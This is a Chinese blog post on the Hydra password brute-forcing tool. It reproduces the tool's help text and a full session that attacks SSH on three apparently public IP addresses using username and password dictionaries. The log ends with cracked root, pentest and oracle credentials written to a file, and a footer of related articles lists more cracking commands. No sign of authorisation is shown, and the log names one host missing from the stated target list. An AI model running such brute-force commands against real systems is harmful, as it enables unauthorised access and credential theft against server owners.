暴力破解工具Hydra

Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SOuvVd46] [service://server[:PORT][/OPT]]

Options:
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ‘:‘ to specify port
-t TASKS run TASKS number of connects in parallel (per host, default: 16)
-U service module usage details
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)

Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at http://www.thc.org/thc-hydra
Don‘t use in military or secret service organizations, or for illegal purposes.

Example: hydra -l user -P passlist.txt ftp://192.168.0.1

# 待破解的主机列表[email protected]:~# cat serverlist 189.37.178.1
189.37.178.216
189.37.178.98
# 破解主机的ssh用户名密码[email protected]:~# hydra -L ssh_user.dic -P ssh_pass.dic -t 5 -vV -o ./output.txt -e ns -M serverlist sshHydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-08-06 23:33:06
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 5 tasks per 3 servers, overall 64 tasks, 36 login tries (l:4/p:9), ~0 tries per task
[DATA] attacking service ssh on port 22
[VERBOSE] Resolving addresses ... done
[INFO] Testing if password authentication is supported by ssh://189.37.178.47:22
[INFO] Successful, password authentication is supported by ssh://189.37.178.47:22
[INFO] Testing if password authentication is supported by ssh://189.37.178.216:22
[INFO] Successful, password authentication is supported by ssh://189.37.178.216:22
[INFO] Testing if password authentication is supported by ssh://189.37.178.98:22
[INFO] Successful, password authentication is supported by ssh://189.37.178.98:22
[ATTEMPT] target 189.37.178.1 - login "root" - pass "root" - 1 of 36 [child 0]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "root" - 1 of 36 [child 1]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "root" - 1 of 36 [child 2]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "" - 2 of 36 [child 3]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "" - 2 of 36 [child 4]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "" - 2 of 36 [child 5]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "123456" - 3 of 36 [child 6]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "123456" - 3 of 36 [child 7]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "123456" - 3 of 36 [child 8]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "toor" - 4 of 36 [child 9]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "toor" - 4 of 36 [child 10]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "toor" - 4 of 36 [child 11]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "oracle123" - 5 of 36 [child 12]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "oracle123" - 5 of 36 [child 13]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "oracle123" - 5 of 36 [child 14]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "111111" - 6 of 36 [child 3]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "111111" - 6 of 36 [child 4]
[22][ssh] host:189.37.178.98   login: root
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "admin" - 10 of 36 [child 5]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - 11 of 36 [child 2]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "123456" - 12 of 36 [child 8]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "toor" - 13 of 36 [child 14]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "oracle123" - 14 of 36 [child 11]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "111111" - 15 of 36 [child 5]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "oracle" - 7 of 36 [child 12]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "222222" - 8 of 36 [child 3]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "444444" - 9 of 36 [child 6]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "admin" - 10 of 36 [child 0]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - 11 of 36 [child 9]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "123456" - 12 of 36 [child 9]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "oracle" - 16 of 36 [child 2]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "oracle" - 7 of 36 [child 7]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "222222" - 8 of 36 [child 4]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "444444" - 9 of 36 [child 13]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "admin" - 10 of 36 [child 10]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "222222" - 17 of 36 [child 5]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "444444" - 18 of 36 [child 14]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "pentest" - 19 of 36 [child 8]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - 20 of 36 [child 11]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "123456" - 21 of 36 [child 2]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "toor" - 13 of 36 [child 0]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "oracle123" - 14 of 36 [child 9]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "toor" - 22 of 36 [child 5]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "oracle123" - 23 of 36 [child 14]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "111111" - 24 of 36 [child 11]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "oracle" - 25 of 36 [child 8]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "111111" - 15 of 36 [child 12]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "oracle" - 16 of 36 [child 3]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "222222" - 17 of 36 [child 6]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "222222" - 26 of 36 [child 2]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - 11 of 36 [child 7]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "123456" - 12 of 36 [child 4]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "toor" - 13 of 36 [child 13]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "oracle123" - 14 of 36 [child 10]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "444444" - 27 of 36 [child 5]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "oracle" - 28 of 36 [child 11]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - 29 of 36 [child 14]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "123456" - 30 of 36 [child 8]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "444444" - 18 of 36 [child 9]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "pentest" - 19 of 36 [child 0]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "toor" - 31 of 36 [child 2]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "" - 20 of 36 [child 12]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "123456" - 21 of 36 [child 3]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "toor" - 22 of 36 [child 6]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "oracle123" - 23 of 36 [child 12]
[22][ssh] host:189.37.178.1   login: pentest   password: 123456
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "oracle" - 28 of 36 [child 3]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "oracle123" - 32 of 36 [child 5]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "111111" - 33 of 36 [child 11]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "222222" - 35 of 36 [child 14]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "444444" - 36 of 36 [child 8]
[STATUS] attack finished for189.37.178.98 (waiting for children to complete tests)
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - 29 of 36 [child 9]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "123456" - 30 of 36 [child 9]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "toor" - 31 of 36 [child 0]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "oracle123" - 32 of 36 [child 12]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "111111" - 33 of 36 [child 6]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "111111" - 15 of 36 [child 4]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "oracle" - 16 of 36 [child 13]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "222222" - 17 of 36 [child 10]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "222222" - 35 of 36 [child 3]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "444444" - 18 of 36 [child 4]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "pentest" - 19 of 36 [child 13]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - 20 of 36 [child 10]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "444444" - 36 of 36 [child 0]
[STATUS] attack finished for189.37.178.1 (waiting for children to complete tests)
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "123456" - 21 of 36 [child 1]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "toor" - 22 of 36 [child 4]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "oracle123" - 23 of 36 [child 1]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "111111" - 24 of 36 [child 1]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "oracle" - 25 of 36 [child 7]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "222222" - 26 of 36 [child 1]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "444444" - 27 of 36 [child 7]
[ATTEMPT] target 189.37.178.216 - login "oracle" - pass "oracle" - 28 of 36 [child 1]
[ATTEMPT] target 189.37.178.216 - login "oracle" - pass "" - 29 of 36 [child 7]
[22][ssh] host:189.37.178.216   login: oracle   password: oracle
[STATUS] attack finished for189.37.178.216 (waiting for children to complete tests)
3 of 3 targets successfully completed, 3 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-08-06 23:33:41
# 查看output.txt即可查看已破解成功的列表

[email protected]:~# cat output.txt
# Hydra v8.2 run at 2017-08-06 23:14:40 on serverlist ssh (hydra -L ssh_user.dic -P ssh_pass.dic -t 5 -vV -o ./output.txt -e ns -M serverlist ssh)
[22][ssh] host: 189.37.178.98   login: root
[22][ssh] host: 189.37.178.1   login: pentest   password: 123456
[22][ssh] host: 189.37.178.216   login: oracle   password: oracle
时间: 2024-10-12 00:07:16

暴力破解工具Hydra的相关文章

linux 下暴力破解工具hydra

安装暴力破解工具 # yum install cmake # cd /usr/local/src # wget http://www.libssh.org/files/0.4/libssh-0.4.8.tar.gz # tar zxf libssh-0.4.8.tar.gz # cd libssh-0.4.8 # mkdir build # cd build # cmake -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_BUILD_TYPE=Debug -DWITH_S

Linux下暴力破解工具Hydra详解

一.简介 Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fa

转:Linux下暴力破解工具Hydra详解

一.简介 Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fa

Linux下暴力破解工具Hydra

引自:http://www.cnblogs.com/mchina/archive/2013/01/01/2840815.html 安装: 1 wget http://www.thc.org/releases/hydra-8.1.tar.gz 2 tar zxvf hydra-7.4.1.tar.gz 3 cd hydra-7.4.1 4 ./configure 5 make && make install 破解ssh示例: hydra -L users.txt -P password.tx

暴力破解工具 medusa (马杜莎)

官网 http://foofus.net/goons/jmk/medusa/ 和知名的暴力破解工具 hydra 很像的另一个工具 Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]> medusa: option requires an argument -- 'h' CRITICAL: Unknown error processing command-line opti

初试在线破解工具Hydra爆破3389服务器

转自:http://www.cnblogs.com/hkleak/p/5169079.html hydra是一款全能的暴力破解工具,功能强大,几乎支持所有的协议,是著名黑客组织thc开发的. 在Kali Linux下已经是默认安装的,于是测试爆破一下自己的一台VM虚拟机服务器.hydra还支持GUI图形界面(xhydra),不过习惯还是命令好用. (爆破3389端口终端登录的帐号和密码 协议:rdp) 帮助命令:hydra -h  //查看基本用法 参数说明: hydra [[[-l login

linux暴力密码破解工具hydra安装与使用

说明:hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码.官网:http://www.thc.org/thc-hydra,可支持AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, H

[转]Linux下的暴力密码破解工具Hydra详解

摘自:http://linzhibin824.blog.163.com/blog/static/735577102013144223127/ 这款暴力密码破解工具相当强大,支持几乎所有协议的在线密码破解,其密码能否被破解关键在于字典是否足够强大.对于社会工程型渗透来说,有时能够得到事半功倍的效果.本文仅从安全角度去探讨测试,使用本文内容去做破坏者,与本人无关. 一.简介 hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码.官网:http://www.thc.org/

Hydra暴力破解工具使用

1      破解telnet服务登陆账号和密码 使用命令:hydra 192.168.43.133 -l telnet -P p.txt telnet 命令解释:被攻击主机IP是192.168.43.133,小写-l 指定登陆账号,大写-L则可以指定文件进行账号破解,大写-P指定要破解的密码字典,如果是用小写-p参数则指定具体的密码.账号破解出来了是telnet,密码也是telnet.也可以用-o参数来指定破解的结果写入到一个文件中去. 2      破解ssh服务登陆账号和密码 使用命令:h